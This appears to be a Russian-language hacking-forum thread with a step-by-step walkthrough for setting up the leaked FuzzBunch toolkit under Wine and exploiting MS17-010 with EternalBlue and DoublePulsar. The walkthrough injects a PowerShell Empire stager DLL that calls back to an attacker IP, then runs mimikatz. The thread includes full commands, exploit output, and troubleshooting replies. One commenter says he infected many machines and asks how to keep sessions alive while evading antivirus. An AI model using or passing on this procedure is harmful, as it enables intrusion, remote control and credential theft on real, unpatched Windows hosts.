Как не закрыта? А это?На момент написания статьи (13.05.2017) уязвимость MS17-010 не закрыта! Единственный метод защиты - настроить фаервол и закрыть\ фильтровать порты.
А если остановить службу "Сервер", можно я не буду фильтровать порты?
Следуйте инструкциям в видео ниже, чтобы узнать, как установить наш сайт как веб-приложение на главный экран вашего устройства.
Примечание: Эта функция может быть недоступна в некоторых браузерах.
git clone github.com/fuzzbunch/fuzzbunch.git
apt-get instal wine winbind
mkdir ~/.wine_fuzzbunch
WINEPREFIX="/root/.wine_fuzzbunch/" winecfg
export WINEPREFIX=/root/.wine_fuzzbunch/
cd ~/.wine_fuzzbunch/
ls
wine regedit.exe
c:\\windows;c:\\system;C:\\Python26;C:\\nsa\windows\fuzzbunch
mkdir -p ~/.wine_fuzzbunch/drive_c/nsa/windows
cd ~/.wine/drive_c/nsa/windows
cp -R [ваш_каталог_с_fuzzbunch]/* .
wget https://www.python.org/ftp/python/2.6/python-2.6.msi
wget https://downloads.sourceforge.net/project/pywin32/pywin32/Build 219/pywin32-219.win32-py2.6.exe?r=&ts=1493192168&use_mirror=netcologne
wine msiexec /i python-2.6.msi
wine pywin32-219.win32-py2.6.exe
wine cmd.exe
cd C:\Python26\Scripts
python pywin32_postinstall.py -install
cd C:\nsa\windows
mkdir listeningposts
python fb.py
Default Target IP Address : 10.10.36.5
Default Callback IP Address: 10.10.100.2
Use Redirection: no (с параметром yes у меня не завелось)
Base log directory: C:\logs (тут будут логи всех команд и действий с атакуемой машины)
Задаем имя проэкту: parrot_empire
use Eternalblue
Mode :: Delivery mechanism
usestager dll MyEmpire
set Arch x64
set OutFile /root/.wine_fuzzbunch/drive_c/launcer64.dll
execute
use DoublePulsar
Protocol SMB
Architecture 1 (x64) - меняем архитектуру
Function: 2 - В качестве функции выбираем ddl , созданную в Empire
DllPayload: C:\launcher64.dll
interact BWUEHDPACARXAW3Y
mimikatz
Статья читается полностью. Тезисы со ссылками на разделы появятся позже.
Как не закрыта? А это?На момент написания статьи (13.05.2017) уязвимость MS17-010 не закрыта! Единственный метод защиты - настроить фаервол и закрыть\ фильтровать порты.
Уже закрыли. Да, если отключить SMB службу, то можно не фильтровать. Но пока самый простой способ - обновиться.Как не закрыта? А это?
А если остановить службу "Сервер", можно я не буду фильтровать порты?
Спасибо за отзыв. Но в начале я честно предупредил о копипасте. Просто хотел поделиться личным опытом лустановки использования. Про DoublePulsar каюсь, паралельно читал про DarkPulsar и опечатался.Статья конечно хорошая, но как мануал по установке FuzzBunch(коих уже тысячи). Не объяснено ни одного термина. EternalBlue, DoublePulsar (который в начале статьи ты обозвал DarkPulsar'om) а это по сути dll injector и в остальном как гайд по установке неплохо. А вот интересно как раз было бы почитать полный разбор всех слитых эксплоитов, что как и зачем. Но эту тему я наверное на себя возьму после PHDAYS.
Я могу ошибаться, но есть предположение, что нужно пробросить порт listenera на router2. Судя по логу агент не может достучаться к listener'у.Всем привет и сразу спасоибо за статью!
возник вопрос, есть схема, kali->router1->inet->vpn(pptp от ноута к router2)->router2->pc MS17-010, вобщем все получается, только после отправке dll через FuzzBunch ничего не проихидит, вернее "[+]Command completed successfully [+]Doublepulsar Succeeded", а в Empire сессия не приходит.
[?] Execute Plugin? [Yes] : yyeyesyes
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (43 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
0x00000020 69 63 65 20 50 61 63 6b 20 31 00 ice Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
.............DONE.
[+] Sending large SMBv1 buffer..DONE.
[+] Sending final SMBv2 buffers......DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[-] No response received from exploit packet. Not good.
[+] CORE terminated with status code 0xdf5d0013
[-] Error getting output back from Core; aborting...
[!] Plugin failed
[-] Error: Eternalblue Failed
аналогичная проблема, проброс портов не помог. в чем может быть проблема?Прокинь порты
Проверь уязвим ли хост, открыты ли порты (может фаервол включен), попробуй включить\отключить антивирус. Устанавливал ли обновления на win7.Всем привет, отличная статья, респект автору!
Но возникла вот такая проблема
Заранее спасибо!Код:[?] [+] Backdoor not installed, game on. Windows 7 Professional 7601 Service Pack 1. Receiving response from exploit packet [-] No response received from exploit packet. Not good. [+] CORE terminated with status code 0xdf5d0013 [-] Error getting output back from Core; aborting... [!] Plugin failed [-] Error: Eternalblue Failed
Давай я погуглю за тебя:https://www.powershellempire.com/?page_id=139кто решил проблему такого характера заразил много машин они ессно на след день перегрузились почти все, агенты в empire есть!(остались) включается interact! НО... при команде sysinfo никакой реакции!..... то есть после того как машина жертвы пере загрузилась сессия пропала((( кто что посоветует?? как сохранить(возобновить) сессию!?
ПС не хочется юзать метерпретор.... он такое умеет оставатся,(но он палится) мне больше empire по душе...
это все я знаю Бро! персистенс и т.д. закрепится в системе кстати авторан можно включить в скрипте персистенс но дело в другом! А именно то что персистенс палится антивирусом((( вопрос как это обойти?) он закрепляется! Но после перезагрузки отпадает от ОС-иДавай я погуглю за тебя:***Скрытый текст***
Я только за! Потестируй на виртуалках, со свежими фришными антивирусами как вариант. И отпишись пожалуйста. Думаю многим будет интересно почитать. Я пока такими тестами заняться не могу, т.к. работаю над другим проэктом. Но если выкроиться время -потестирую.Тема интересна всем я думаю давайте ее развивать но уже ниже!))
Комментарии
14